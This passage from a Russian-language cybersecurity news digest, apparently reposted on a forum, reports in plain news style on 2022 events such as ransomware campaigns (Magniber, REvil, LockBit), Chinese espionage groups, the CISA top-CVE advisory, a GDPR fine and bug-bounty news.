размер ущерба от срыва бизнес-операций, стоимость юридических услуг, затраты на сдерживание атаки, выявление и удаление вредоносного ПО, восстановление данных из резервных копий, наем внешних экспертов и пр. </p> <p> Даже если жертва заплатит выкуп, избежать финансового ущерба ей все равно не удастся. На расшифровку данных с помощью полученного от вымогателей ключа обычно уходит больше времени, чем на их восстановление из резервных копий. </p> <p> Кибервымогательские группировки и операторы крупных RaaS-сервисов хорошо понимают этот хрупкий экономический баланс и делают все возможное для того, чтобы уплата выкупа была самым рациональным решением для жертвы. Во время переговоров с пострадавшей организацией вымогатели сопоставляют сумму выкупа с побочным финансовым ущербом, и уплата выкупа становится для нее наиболее финансового выгодным вариантом. </p>
 
https://top.probiv.uno/attachments/mm1234567-png.138469/

Для этого въезд в Соединенные Штаты упростят для ряда россиян
image


Bloomberg сообщило о планах администрации Байдена смягчить ряд визовых ограничений для квалифицированных специалистов из России. Эта мера сделает более комфортным переезд ученых в США и ослабит высокотехнологичный потенциал России.
Отмечается, что предложение по упрощению прохождения процедуры правительство включило в свой последний дополнительный запрос Конгрессу. Если закон примут, упрощенной системой смогут воспользоваться те россияне, которые получили степень магистра или доктора наук.

США хотят привлечь россиян с опытом работы с полупроводниками, космическими технологиями, кибербезопасностью, современными вычислениями и производством, ядерной инженерией, искусственными интеллектом и технологиями ракетных двигателей и другими наукоемкими областями.

Сотрудник в Совете нацбезопасности США отметил, что такие меры созданы для «ослабления высокотехнологичных ресурсов России в краткосрочной перспективе и подрывания инновационной базы страны в будущем».

Ранее стало известно, что ФСИН будет привлекать осуждённых IT-специалистов к удалённой работе на российские компании. Для них создадут центры, форма наказания в которых — исправительные работы.

Интернет-омбудсмен при президенте РФ Дмитрий Мариничев считает, что подготовка IT-специалистов в России может навредить стране . По его мнению, подготовленный за государственный счет специалист «будет молиться» на западные страны и пытаться покинуть РФ.

Ранее Песков назвал "уткой" сообщения в социальных сетях о якобы подготовке ограничений на выезд из страны специалистов ИТ-отрасли или дополнительных проверок в их адрес.

Штраф наложен за раскрытие конфиденциальных данных о 491 939 пациентах из 28 лабораторий.
image



Французское агентство по надзору за конфиденциальностью данных CNIL оштрафовало разработчика медицинского программного обеспечения Dedalus Biology на 1,5 млн евро за нарушение трех статей «Общего регламента по защите данных» (General Data Protection Regulation, GDPR).

Dedalus Biology предоставляет услуги тысячам медицинских лабораторий в стране, и штраф наложен за раскрытие конфиденциальных данных о 491 939 пациентах из 28 лабораторий. Доступными в Сети оказались такие данные о пациентах, как ФИО, номер социального страхования, имя врача, дата осмотра, информация о ВИЧ-статусе, раке, генетических заболеваниях и беременности.

Первые признаки утечки базы данных появились еще в марте 2020 года, а в ноябре 2020 года французское агентство ANSSI выдало соответствующее предупреждение одной из лабораторий. В феврале 2021 года французский журнал ZATAZ обнаружил выставленные на продажу в даркнете данные пациентов и подтвердил достоверность информации.

Dedalus Biology нарушила статью 29 закона GDPR, которая заключается в несоблюдении инструкций контроллера. В частности, при переходе с ПО другого поставщика по запросу двух медицинских лабораторий компания Dedalus Biology извлекла больше информации, чем требовалось.

Второе нарушение касается статьи 32 GDPR, которая возлагает на обработчиков данных ответственность за неспособность защитить информацию. Расследование CNIL выявило отсутствие конкретной процедуры операций по переносу данных; отсутствие шифрования личных данных, хранящихся на сервере, отсутствие автоматического удаления данных при переходе на другое ПО, отсутствие требуемой аутентификации для доступа к общедоступной части сервера, использование учетных записей пользователей, разделенных между несколькими сотрудниками в приватной зоне сервера, а также отсутствие процедуры наблюдения и эскалации предупреждений безопасности на сервере.

Также была нарушена статья 28 GDPR, которая касается обязательства предоставить официальный договор или юридический акт для обработки данных от имени контролеров (лабораторий).
 
https://top.probiv.uno/attachments/mm1234567-png.138469/

Всего компания заплатит 1.5 млн долларов.
image



Google объявила о 50% бонусе в дополнение к основной награде для специалистов, сообщивших об уязвимостях в бета-версии Android 13 в рамках программы Vulnerability Rewards Program (VRP).

«Уязвимости, обнаруженные в бета-версии Android 13 в период с 26.04.22 по 26.05.22, имеют право на выплату 50% бонусного вознаграждения (максимум до 1,5 млн долларов за полную цепочку эксплойтов на Titan M). Для получения более подробной информации обратитесь к странице Android reward , - говорится в сообщении компании.

Список недостатков включает ошибки в ПО, влияющим на безопасность устройств Google и помимо прочих включает уязвимости в:
  • Android Open-Source Project (AOSP);
  • Trusted Execution Environment (TEE);
  • System on chip (SoC);
  • MicroController Unit (MCU).
Специалисты могут быть вознаграждены дополнительно за предоставление эксплойтов с уязвимостями безопасности, возможностью выполнения произвольного кода, эксфильтрации данных или обхода экрана блокировки.

С момента запуска программы поощрения уязвимостей Chromium в 2010 году компания выплатила вознаграждений на более чем 29 миллионов долларов.

Ранее сообщалось , что в 2021 году 696 человек получили вознаграждения от Google, а самая высокая награда составила 157 000 долларов за цепочку эксплойтов для Android.

Onleihe столкнулась с проблемами с медиафайлами после киберинцидента.
image



Согласно заявлению , на прошлой неделе произошел системный сбой и были удалены зашифрованные файлы с защитой от копирования. Файлы будут полностью загружены в библиотеку после повторного шифрования.

После атаки в электронных книгах стали отображаться только первая глава или страницы в случайном порядке. Также появились ошибки потоковой передачи мультимедиа. Кроме того, форумы на платформе в данный момент недоступны из-за неизвестной технической ошибки.

Onleihe предоставила список поврежденных материалов и порекомендовала пользователям удалить их с устройств и загрузить снова.

Сбои в работе библиотеки произошли из-за кибератаки на провайдера EKZ 18 апреля, отключившей работу сайтов EKZ и онлайн-библиотеки Divibib. Вчера компания заявила о восстановлении большинства систем, однако, наблюдаются задержки в выставлении счетов и обработке заказов.

28 апреля группировка LockBit опубликовала данные, предположительно украденные из EKZ. По сообщениям экспертов, фирма не выкупит информацию обратно, а восстановит материалы из резервных копий.

Onleihe является сервисом с возможностью арендовать электронные книги, журналы, видео- и аудиозаписи. Онлайн-библиотеку института Гёте используют многие университеты Европы, а в Германии на долю платформы приходится около 40% всего потребления электронных книг.

На прошлой неделе ФБР предупредило сельскохозяйственный сектор о со стороны вымогателей во время посевного сезона и сбора урожая, что приведет к срыву поставок и финансовым потерям.

Страны подписали политическое обязательство продвигать правила для Интернета, основанные на демократических ценностях.
image



28 апреля 2022 года США и 60 стран и глобальных партнеров подписали документ под названием « Декларация о будущем интернета ». Согласно тексту, они обязуются «продвигать свободный, открытый, глобальный, функционально совместимый, надежный и безопасный интернет для всего мира, который базируется на единых для всех правилах и демократических ценностях
«Нас объединяет вера в потенциал цифровых технологий для обеспечения связи, демократии, мира, верховенства закона, устойчивого развития и осуществления прав человека и основных свобод», — начинается документ. Но «доступ к открытому Интернету ограничен некоторыми авторитарными правительствами и онлайн-платформами, а цифровые инструменты все чаще используются для подавления свободы выражения мнений и лишения других прав человека и основных свобод».

«Мы наблюдаем тенденцию роста цифрового авторитаризма, когда некоторые страны работают над подавлением свободы выражения мнений, цензурой в отношении независимых новостных источников, вмешательством в выборы, продвижением дезинформации по всему миру и лишением своих граждан других прав», — пояснил представитель администрации США.

США с партнерами собирается использовать декларацию и заложенные в ней принципы для укрепления существующих институтов, сохранения единого глобального интернета без границ и цифровой экосистемы, которая будет по-настоящему открыта и способствует конкуренции, обеспечивает конфиденциальность и уважает права человека.

Подписанты также соглашаются соблюдать принципы сетевого нейтралитета и «воздерживаться от блокировки или ограничения доступа к законному контенту, услугам и приложениям в Интернете». Неясно, как эта формулировка будет согласовываться с подписанными правилами, такими как британский законопроект о безопасности в Интернете , который требует от компаний уменьшать видимость «законного, но вредного» онлайн-контента.

В документе не были названы конкретные авторитарные режимы, однако чиновник из администрации президента США обвинил российское руководство в том, чем давно занимаются власти США — цензурой и блокировкой неугодных цифровых ресурсов.

Настороженность была выражена и по отношению к Китаю, так как он по мнению собравшихся вокруг США стран, является одним из лидеров «новой опасной модели интернет-политики».

В Декларации отмечается, что существует риск фрагментации интернета, в том числе в связи с угрозами российского правительства полностью или частично отключиться от глобальной сети, и также злоупотреблениями, которые проявляются в кибератаках, онлайн-цензуре и дезинформации.

В числе тех, кто присоединился к декларации, - все члены ЕС, Австралия, Великобритания, Грузия, Израиль, Канада, Сербия, Украина, Япония, а также Европейская комиссия и Тайвань. По мнению вашингтонской администрации, со временем подписей под документом будет еще больше. Ее представитель во время брифинга отказался уточнить, обращались ли власти США с данной декларацией к РФ и КНР. "Я не думаю, что это станет неожиданностью для каких-либо стран, даже для тех, которые, как мы всегда считали, вряд ли присоединятся к этому, но я не буду комментировать конкретные дипломатические обсуждения", - сказал один из чиновников, отвечая на соответствующий вопрос журналистов.

Вымогательское ПО Magniber атакует не предприятия, а студентов и рядовых пользователей.
image



Злоумышленники рассылают поддельные обновления для Windows 10 с целью заражения компьютеров пользователей вымогательским ПО Magniber. Как сообщает BleepingComputer, вредоносная кампания началась 8 апреля 2022 года, а ее жертвами стали пользователи по всему миру.

Поддельные накопительные обновления или обновления безопасности распространяются под разными именами, но чаще всего как Win10.0_System_Upgrade_Software.msi и Security_Upgrade_Software_Win10.0.msi. Кроме того, подделки рассылаются под именами:

System.Upgrade.Win10.0-KB47287134.msi

System.Upgrade.Win10.0-KB82260712.msi

System.Upgrade.Win10.0-KB18062410.msi

System.Upgrade.Win10.0-KB66846525.msi

Вредоносные обновления распространяются через пиратские сайты, предлагающие ключи активации для ПО. Каким образом потенциальные жертвы заманиваются на вредоносные страницы, неизвестно.

После установки на атакуемой системе Magniber удаляет теневые копии томов и шифрует файлы. В процессе шифрования вымогатель добавляет к ним расширение в виде произвольного набора из восьми букв, например, .gtearevf.

Далее создается файл README.html с запиской о требовании выкупа. В каждой папке содержатся инструкции, как получить доступ к сайту в сети Tor, где можно заплатить выкуп. Сайт My Decryptor позволяет жертвам расшифровать один файл бесплатно, связаться с «техподдержкой», а также выяснить сумму выкупа и биткойн-адрес, на который его нужно перевести. Чаще всего сумма выкупа составляет около $2,5 тыс.

Magniber в основном атакует не предприятия, а студентов и рядовых пользователей. В настоящее время способов восстановления зашифрованных им файлов без уплаты выкупа не существует.
 
https://top.probiv.uno/attachments/mm1234567-png.138469/

На фоне роста напряженности в отношениях между Россией и США группа киберпреступников REvil вернулась с новым шифровальщиком.
image



После начала спецоперации России на Украине, TOR-сайты REvil начали оживать, но на них не было старой информации, они перенаправляли посетителей на URL-адреса новой неназванной группировки хакеров-вымогателей. Пуcть эти сайты не были похожи на предыдущие сайты REvil, тот факт, что старая инфраструктура перенаправляла на новые URL-адреса, указывает на возвращение группировки. Однако, в ноябре на сайтах группировки начали появляться сообщения "REvil это плохо". Такой доступ к сайтам хакеров говорил о действиях правоохранительных органов или киберпреступников, поэтому ожившие страницы REvil не могут быть веским доказательством возвращения банды.

Единственным способом узнать наверняка, вернулась ли REvil, было найти образец программы-шифровальщика и проанализировать его, чтобы определить, был ли он пропатчен или разработан на базе исходного кода. Нужный образец шифровальщика нового вымогательского ПО был обнаружен на этой неделе исследователем AVAST Якубом Крустеком и подтвердил связь безымянной группировки с REvil.

По словам аналитиков, обнаруженный образец вируса был скомпилирован из исходного кода REvil, а также содержит свежие изменения. Исследователь безопасности R3MRUM написал в Твиттере, что номер версии образца изменен на 1.0, но он является продолжением последней версии, 2.08, выпущенной REvil перед ее уничтожением. Специалист не смог объяснить почему вирус не шифрует файлы, но считает, что он был скомпилирован из исходного кода.

bc922b6e3e2e6e9cfdf0617b806ca633.png


Изменение версии в новом шифраторе REvil

Генеральный директор Advanced Intel Виталий Кремез тоже провел исследование образца и подтвердил, что он был скомпилирован из исходного кода 26 апреля. По его словам новый образец REvil включает новое конфигурационное поле 'accs', содержащее учетные данные атакуемой жертвы.

Кремез считает, что параметр конфигурации 'accs' используется для предотвращения шифрования на других устройствах, которые не содержат данные нужных учетных записей и доменов Windows, что позволяет проводить целенаправленные атаки.

В дополнение к параметру «accs» в конфигурации нового образца REvil изменены параметры SUB и PID, используемые в качестве идентификаторов кампании и филиала, для использования более длинных значений типа GUID, таких как «3c852cc8-b7f1-436e-ba3b-c53b7fc6c0e4».

BleepingComputer также протестировал образец программы-вымогателя, он создал примечание о выкупе, которое идентично старым предупреждениям о выкупе REvil.

REvil записка о выкупеНовые группировка называет себя "Sodinokibi", однако новый сайт почти идентичен старому сайту Revil.



Неудивительно, что REvil переименовались в рамках новой операции, особенно в связи с ухудшением отношений между США и Россией.

При ребрендинге операций программ-вымогателей они обычно переименовываются, чтобы обойти правоохранительные органы или санкции, препятствующие выплате выкупа. Поэтому для REvil необычно публично сообщать о своем возвращении, а не пытаться избежать обнаружения, как мы видели во многих других ребрендингах программ-вымогателей.

Какие ошибки эксплуатировали злоумышленники для вредоносных атак
image



Органы по кибербезопасности нескольких стран опубликовали о 15 распространенных уязвимостей и рисков (Common Vulnerabilities and Exposures, CVEs), часто используемых киберпреступниками в 2021 году.

Соавторами документа являются:




  • Агентство кибербезопасности и безопасности инфраструктуры США (CISA),

  • Агентство национальной безопасности США (NSA),

  • Федеральное бюро расследований США (FBI),

  • Австралийский центр кибербезопасности (ACSC),

  • Канадский центр кибербезопасности (CCCS),

  • Новозеландский национальный центр кибербезопасности (NZ NCSC)

  • Национальный центр кибербезопасности Соединенного Королевства (NCSC-UK).

В прошлом году злоумышленники активно использовали критические ошибки против множества организаций государственного и частного секторов по всему миру и

«Во всем мире в 2021 году хакеры атаковали серверы электронной почты и виртуальной частной сети (VPN) с помощью недавно обнаруженных уязвимостей», - говорится в рекомендациях.

Кроме того, взломщики использовали устаревшие уязвимости, применявшихся в 2020 году или ранее. «Использование старых уязвимостей демонстрирует сохраняющийся риск для организаций, не способных своевременно исправлять программное обеспечение или использующих программы, которые больше не поддерживаются поставщиком».

«NCSC и наши союзники привержены повышению осведомленности об уязвимостях и представлению решений для их смягчения. Опубликованная рекомендация даст возможность специалистам устранять наиболее распространенные уязвимости в экосистеме государственного и частного секторов», - сказала генеральный директор Национального Центра Кибербезопасности (NCSC) в Великобритании Линди Кэмерон.

Среди 15 часто применяемых уязвимостей 2021 года известные эксплойты Log4Shell, ProxyShell и ProxyLogon, влияющие на Apache Log4j и Microsoft Exchange Server. Также в список попали баги в VMware, Fortinet и Pulse Secure:

  1. (Log4Shell): уязвимость удаленного выполнения кода (RCE) в Apache Log4j.
  2. : Уязвимость RCE в Zoho ManageEngine AD SelfService Plus
  3. (ProxyShell): Несанкционированное получение прав в Microsoft Exchange Server
  4. (ProxyShell): RCE-уязвимость в Microsoft Exchange Server
  5. (ProxyShell): обход функции безопасности в Microsoft Exchange Server
  6. (ProxyLogon): RCE-уязвимость в Microsoft Exchange Server
  7. (ProxyLogon): RCE-уязвимость в Microsoft Exchange Server
  8. ( ProxyLogon): RCE-уязвимость в Microsoft Exchange Server
  9. (ProxyLogon): RCE-уязвимость в Microsoft Exchange Server
  10. Уязвимость выполнения произвольного кода в Atlassian Confluence Server и Data Center
  11. RCE-уязвимость в клиенте VMware vSphere
  12. (ZeroLogon): уязвимость повышения привилегий в удаленном протоколе Microsoft Netlogon (MS-NRPC).
  13. RCE-уязвимость в Microsoft Exchange Server
  14. : Уязвимость произвольного чтения файлов в Pulse Secure Pulse Connect Secure
  15. : Уязвимость обхода пути в Fortinet FortiOS и FortiProxy

Для повышения безопасности в заключении рекомендуется внедрить управление уязвимостями и конфигурациями, настройку идентификации и доступа, а также надежные средства защиты.

Компании заявили о многочисленных критических Netatalk-уязвимостях серверов.
image



Исходя из опубликованного отчета , с помощью многочисленных недостатков удаленные злоумышленники могут получить конфиденциальную информацию и, возможно, выполнить произвольный код с помощью уязвимой версии Synology DiskStation Manager (DSM) и Synology Router Manager (SRM)

22 марта Netatalk-разработчики выпустили для исправления ошибок в нескольких продуктах корпорации Synology:
  • DSM 7.1
  • DSM 7.0
  • DSM 6.2
  • VS Firmware 2.3
  • SRM 1.2
Производитель уведомил клиентов о трех других уязвимостях CVE-2022-23125 , CVE-2022-23122 , CVE-2022-0194 , позволяющий удаленный злоумышленнику запускать произвольный код на целевых устройствах.

Несмотря на то, что в прошлом месяце команда разработчиков Netatalk выпустила исправления безопасности для устранения недостатков, Synology сообщает, что выпуск некоторых из затронутых продуктов все еще «продолжается».

Компания также добавила, что уязвимости Netatalk уже исправлены для устройств, работающих под управлением DiskStation Manager (DSM) 7.1 или более поздней версии.

Тайваньский поставщик QNAP также призвал специалистов отключить AFP-протокол на сетевых хранилищах (Network Attached Storage, NAS) до устранения недостатков. Кроме того, компания объявила об исправлении уязвимости в QTS 4.5.4.2012 build 20220419 и более поздних версиях.

«QNAP тщательно расследует обнаруженные проблемы. Мы выпустим обновления безопасности для всех затронутых версий операционной системы QNAP и предоставим дополнительную информацию как можно скорее», — сказал производитель NAS.

Netatalk является бесплатной реализацией протокола Apple Filing Protocol (AFP) с открытым исходным кодом, позволяющая применять Unix-подобные операционные системы в качестве файлового сервера для компьютеров на macOS.

Около 10% жителей КНДР взламывают свои смартфоны для обхода госконтроля
image



Американская правозащитная организация Lumen рассказала о том, что жители Северной Кореи научились удачно обходить тотальную цензуру в Сети, которая существует в этой стране.

В Северной Корее нет смартфонов, которыми пользуются во всем мире, у них они другие и с большим количество ограничений. На них установлены только приложения правительства и ряд систем защиты, которые отслеживают использование устройства и ограничивают доступ.

Тем не менее энтузиасты научились обходить ограничения, установленные властями. Правозащитники Lumen утверждают, что северокорейцы, имеющие доступ к ноутбукам, взламывают свои смартфоны с помощью китайской программы. После модификации северокорейцы могут устанавливать на устройства приложения, которые не разрешены правительством.

Также взломанное устройство позволяет удалять снимки экрана, которые постоянно делает программа Trace Viewer. Эта программа установлена на все смартфоны, продаваемые в Северной Корее, она постоянно создает снимки экрана и не позволяет их удалять.

Подобная практика не очень распространена в стране: около 10% населения пытались модифицировать смартфоны, обычно с помощью людей, которых отправили в Китай для обучения программированию.

В отчете отмечается, что на рынке КНДР уже сформировался сегмент продажи взломанных мобильных устройств с полным доступом к интернету.

Новая функция упростит поиск шпионского трекера.
image



Apple выпустила обновление прошивки 1.0.301 для AirTag и сделала гаджет громче, облегчив обнаружение чужой отслеживающей метки.

Функция поддерживается и автоматически загружается в iOS 14.5 или более поздней версии. Пользователь может проверить наличие прошивки в приложении «Локатор» во вкладке «Вещи». После нажатия на метку приложение сообщит об установленной версии. Если обновление отсутствует, то оно будет загружено позже.

В феврале 2022 в сети продавались метки с отключенным звуковым сигналом. Быстро обнаружив проблему, Apple заявила о работе с правоохранительными органами над незаконным использованием AirTag и изложила план будущих изменений.

Корпорация также планирует усовершенствовать свою систему оповещения об отслеживании посторонним трекером. Кроме того, в бета-версии iOS 15.4 во время настройки AirTag появлялось предупреждение о незаконном использовании меток для слежки.

AirTag представляет собой миниатюрное устройство размером с монету для поиска пропавшей вещи, например, ключа, кошелька, велосипеда и любого другого предмета. Однако, пользователи сообщали об использовании маячка для преследования людей, угона автомобилей и других неправомерных действий.

Алмазная пластина диаметром 5 см может хранить огромное количество информации
image



Исследователи из Японии разработали алмазную пластину с возможностью записи данных размером 1 млрд. Blu-Ray дисков.

Специфический дефект в кристалле под названием Азото-замещённая вакансия в алмазе (Nitrogen-Vacancy center, NV-центр) позволяет хранить данные в виде кубитов. Однако, при слишком большом количестве азота алмаз теряет квантовую емкость.

Раньше для решения проблемы ученым не удавалось создать алмазную пластину оптимального размера для возможности применения на практике. Исследователи из Saga University and Adamant Namiki Precision Jewelery Co. Japan разработали новый метод производства сверхчистых алмазных дисков подходящего размера для записи и хранения данных.

Новый процесс подразумевает собой выращивание кристаллов на материале подложки. Поверхность минерала разделяется на секции для распределения напряжения по горизонтали и предотвращения растрескивания. Концентрация азота в этих пластинах составляет менее трех частей на миллиард (Parts per billion, ppb), делая алмаз невероятно чистым. На данный момент это самые большие пластины с таким уровнем чистоты.

Метод позволяет создавать алмазные пластины диаметром 5 см с огромной объемом памяти 25 эксабайт (EB). Компания назвала свои пластины Kenzan Diamond.
 
https://top.probiv.uno/attachments/mm1234567-png.138469/

Хакеры атаковали госучреждения стран Южной Азии.
image



Согласно исследованию аналитика по кибербезопасности Cluster25, появление в последние недели хакерской группы Naikon (Lotus Panda) является очередным доказательством консолидации цифровых сил Китая против Запада.

Предположительно возникшая в Китае в 2010 году группа кибершпионов сосредоточила свое внимание на странах Таиланд, Малайзия и Сингапур. По данным Cluster25, команда Naikon стала известна в после обнаружения её вредоносной программы в 2015 году и ареста одного из ключевых участников. Два года назад была обнаружена деятельность группы против Австралии и азиатских стран, включая Индонезию и Филиппины.

По предположениям эксперта Cluster25, Naikon шпионит за правительственными учреждениями и государственными предприятиями в странах Юго-Восточной Азии. Целевые организации занимаются наукой, технологиями и иностранными делами.

«Наблюдая за хакерским арсеналом Naikon, был сделан вывод о способности команды проводить долгосрочный шпионаж с целью проведения атак на иностранные правительства и должностных лиц», - говорится в сообщении. «Чтобы избежать обнаружения и максимизировать результат, группа со временем изменила тактику, методы и процедуры (tactics, techniques and procedures, TTPs) и инструменты», - добавил исследователь.

В прошлом году на почту целевых организаций были отправлены фишинговые электронные письма, запустившие код оболочки для захвата компьютера жертвы.

«Цель этой атаки в настоящее время неизвестна, но с высокой вероятностью, учитывая предыдущую историю нападения группы, это может быть правительственное учреждение из страны Южной Азии», - говорится в сообщении аналитика.

Электронное письмо-приманка было написано на китайском языке в виде ответа на организацию тендера на закупку защитного оборудования брандмауэра. Naikon также использовал программные средства Viper и Asset Reconnaissance Lighthouse (ARL) с открытым исходным кодом, разработанные предположительно китайским программистом. Такой вывод сделан, учитывая китайский язык вспомогательной документации.

«Viper превращает в Орудие тактику и технологии, используемые в процессе проникновения в интранет», - сказал Cluster25. «Инструмент ARL помогает группам безопасности и пентестерам в разведке и поиске активов, обнаружении существующих слабых мест и поверхностей атаки», - добавил эксперт.

Инструменты могут использоваться для создания полезных нагрузок и сбора информации с помощью цифрового отпечатка (website fingerprint).

Также недавно была выявлена новая китайская кибершпионская группировка Moshen Dragon после атаки телеком-провайдеров.

Группировка Winnti активна с 2010 года и предположительно поддерживается правительством Китая.
image



Китайская киберпреступная группировка Winnti в течение долгих лет похищает интеллектуальную собственность и другие чувствительные данные у американских и азиатских компаний, сообщают специалисты ИБ-компании Cybereason.

По данным исследователей, группировка уже похитила сотни гигабайт информации у более 30 организаций по всему миру. Огромную часть похищенных данных составляют коммерческие тайны, в том числе чертежи, формулы, диаграммы, проприетарные производственные документы и пр.

Кроме того, Winnti собрала сведения о сетевой архитектуре атакуемых организаций, пользовательские учетные записи, данные клиентов и бизнес-документы для использования в будущих атаках.

Специалисты Cybereason передали собранные о Winnti данные ФБР, которое еще в 2019 году предупреждало о финансируемых Пекином киберпреступных группировках, занимающихся массовыми кражами интеллектуальной собственности у американских компаний в рамках инициативы по модернизации китайской экономики «Сделано в Китае 2025».

Winnti (другие названия APT41, Wicked Panda и Barium) активна как минимум с 2010 года и предположительно финансируется или поддерживается правительством Китая. Некоторые ИБ-компании рассматривают Winnti как общий термин для множества хакерских группировок, работающих под контролем китайских спецслужб.

Специалисты выявили последнюю вредоносную кампанию группировки в 2021 году во время расследования взлома компании стоимостью $5 млрд с производственными мощностями в Азии, Северной Америке и Европе.

Расследование велось 12 месяцев и получило название «Операция пчелы-кукушки» (Operation CuckooBees), поскольку пчелы-кукушки неуловимы, а Winnti является одной из самых неуловимых хакерских группировок в мире.

Одной из особенностей новой кампании Winnti является использование функции Windows под названием Common Log File System (CLFS) для сокрытия вредоносного ПО. По словам исследователей, механизм CLFS весьма неясный и до сих пор не задокументирован Microsoft. С его помощью злоумышленники прячут свою полезную нагрузку в местах, которые не сканируются решениями безопасности и ускользают от внимания ИБ-экспертов. Такой способ сокрытия вредоносного ПО не используется ни одной хакерской группировкой, кроме Winnti.

В новой кампании группировка атакует доступные через интернет уязвимые серверы, через которые получает первоначальный доступ к сети. В некоторых случаях злоумышленники также эксплуатируют известные уязвимости в ERP-платформах.

Взлом служебной электронной почты еще остается прибыльным для киберпреступников.
image



Согласно данным ФБР, с 2016 года из-за мошенничества с компрометацией деловой электронной почты было потеряно более 43 миллиарда долларов.

ФБР и Центр рассмотрения жалоб на интернет-преступления (Internet Crime Complaint Center, IC3) обнаружили , что с июня 2016 года по декабрь 2021 года в результате более 241 000 инцидентов было похищено $43,31 млрд.

Мошенничество с компрометацией деловой электронной почты (Business Email Compromise, BEC) позволяет злоумышленнику осуществить несанкционированный перевод средств с помощью взлома служебной или личной учетной записи электронной почты, используя социальную инженерию или компьютерное вторжение. По заявлению ФБР, в настоящее время осуществляются кражи личной информации сотрудников, бланков отчетов о заработной плате и налогах (W-2) и криптокошельков.

«Цифры в отчете, вероятно, являются нижней границей фактических цифр, учитывая, что большое количество инцидентов остается незарегистрированным», - сказал старший консультант по безопасности LARES Consulting Энди Гилл.

«BEC-атаки часто проводятся с помощью фишинга цели для получения доступа к почтовым ящикам. Злоумышленник ищет важные темы, такие как переписка с поставщиком или с сотрудником внутри компании для дальнейшей атаки на работников или внешнюю компанию», - добавил Гилл.

«BEC-мошенничество было зарегистрировано во всех 50 штатах и 177 странах, причем мошеннические переводы осуществлялись в более чем 140 стран», - пояснили в ФБР.

«Основываясь на финансовых данных IC3 за 2021 год, основные средства от мошенников проходили через банки Таиланда и Гонконга. Китай, входивший в число двух крупнейших получателей средств в предыдущие годы, в 2021 году занял третье место, за ним последовали Мексика и Сингапур», - добавили в ФБР.

По заявлению специалиста Сунила Юй с сервиса JupiterOne, у BEC-киберпреступников также была структура поддержки, включающая наличие денежных мулов. Смурферы передавали отмытые украденные средства мошенникам.

«Более широкие информационно-просветительские кампании и более строгие и публичные наказания для денежных мулов могут сократить их деятельность и помешать злоумышленникам украсть незаконно присвоенные средства», - сказал Юй. «Когда переводы средств замедлятся или приостановятся, у жертвы появится шанс вернуть украденные средства при обнаружении взлома», - добавил эксперт.

Поддельные предложения о работе распространяли вредоносное ПО
image



Пользователи Pixiv, DeviantArt и других онлайн-сообществ художников получили многочисленные предложения от людей, представившимися создателями проекта ограниченной NFT-коллекции Cyberpunk Ape Executives, основной целью которого является заражение устройств художников вредоносными программами и кража данных.

По сообщению Malwarebytes, злоумышленник нацелен на художников с предложениями работать с создателями проекта и разработать новый набор персонажей для расширения коллекции новыми NFT, предлагая вознаграждение до $350 в день.

«Привет! Мы вдохновлены вашими работами! Cyberpunk Ape Executives приглашает 2D-художников (онлайн / фрилансеров) к сотрудничеству в создании проекта NFT. Как 2D-художник, вы будете создавать удивительных и очаровательных NFTперсонажей . Ваши персонажи станут важной частью нашей вселенной NFT!

Наши ожидания от кандидата:

1) Опыт работы в качестве 2D-художника;

2) Опыт и примеры создания персонажей;

3) Навыки работы в Photoshop.

Основные задачи:

1) Создание персонажей в нашем стиле NFT;

2) Взаимодействие с руководителем арт-группы по постановке задач, обратная связь.

Для дальнейшего общения ознакомьтесь с примерами наших работ NFT: [url удален] и отправьте ответ (резюме + примеры ваших работ) на эту должность. Примерная оплата в день = 200-350 долларов. Мы осуществляем платежи через Paypal, BTC, ETH, LTC

В отправленных художникам сообщениях была ссылка на страницу загрузки MEGA с защищенным паролем RAR-архивом объемом 4,1 МБ с названием «Cyberpunk Ape Exemples (pass 111).rar», содержащим образцы работ Cyberpunk Ape Executives. Внутри архива среди GIF-файлов Cyberpunk Ape был спрятан исполняемый exe-файл в виде другого GIF-изображения, легко сливающийся с остальной коллекцией. Исполняемый файл являлся программой установки вредоносного ПО, заражающим устройство трояном и крадущим информацию с возможностью обойти AV-детектирование на основе текущих VirusTotal-обнаружений.

Похититель мог украсть пароли учетных записей, криптокошельки, кредитные карты или даже файлы на диске. После взлома учетной записи с большим количеством подписчиков, хакер мог использовать профиль для продвижения аферы среди еще большего количества пользователей. По заявлениям художников, бот-аккаунты продолжали отправлять предложения каждые несколько минут, и в некоторых случаях сообщения были на японском языке.

«В настоящее время существует мошенничество людей, которые притворяются, что работают с нами. Это неправда. Не отвечайте. Не переходите по ссылке. Сообщайте о людях, которые делают это на платформе, на которой они с вами связываются», - написали в Twitter представители проекта CYBERPUNK APE EXECUTIVES.

Выгодные предложения о работе могут быть очень заманчивыми и содержать в себе подвох. Пользователю следует связаться с проектом или компанией напрямую для подтверждения электронного письма или просмотреть аккаунты в соцсетях для получения дополнительной информации. Такой алгоритм действий раскрыл бы аферу проекта Cyberpunk Ape Executives.

Загруженные файлы из интернета нужно всегда сканировать с помощью антивирусной программы. Более того, вредоносные файлы могут быть не обнаружены программой, поэтому использование многофакторной аутентификации (Multi-factor authentication, MFA) является хорошим средством обеспечения защиты личных данных.

CrowdStrike обнаружила DoS-атаку с использованием образов Docker, направленную на домены из списка целей IT-армии Украины.
image



Исследователи из компании CrowdStrike обнаружили DoS-атаку, взломавшую ханипоты Docker Engine. Атака была направлена на российские и белорусские сайты в условиях продолжающейся спецоперации на Украине. Согласно данным компании , ханипоты взломали четыре раза в период с 27 февраля по 1 марта 2022 года с помощью двух разных образов Docker. В обоих случаях атака проводилась на домены из списка целей IT-армии Украины.

ca0ec4780b75588baa606b1f0c9eeb71.png

Список целей IT-армии Украины с сайта CrowdStrike.

CrowdStrike связала эти атаки с проукраинской деятельностью против России. Компания предупредила о риске ответных действий со стороны хакерских группировок, поддерживающих Российскую Федерацию.

Ханипоты были взломаны через открытый API Docker Engine для заражения неправильно сконфигурированных контейнерных движков. Такой метод обычно используют группировки LemonDuck и WatchDogs, заявила в своем блоге CrowdStrike. Первый образ Docker был замечен в трех из четырех инцидентов и уже размещен на Docker Hub.

"Образ был загружен более 100 000 раз, но аналитики CrowdStrike не могут оценить количество загрузок из взломанной среды. Образ Docker содержит инструмент HTTP-тестирования bombardier, использующий HTTP-запросы для стресс-теста веб-сайта. В данном случае bombardier использовался как DoS-инструмент, автоматически запускаемый при создании нового контейнера на базе образа Docker", – добавила CrowdStrike.

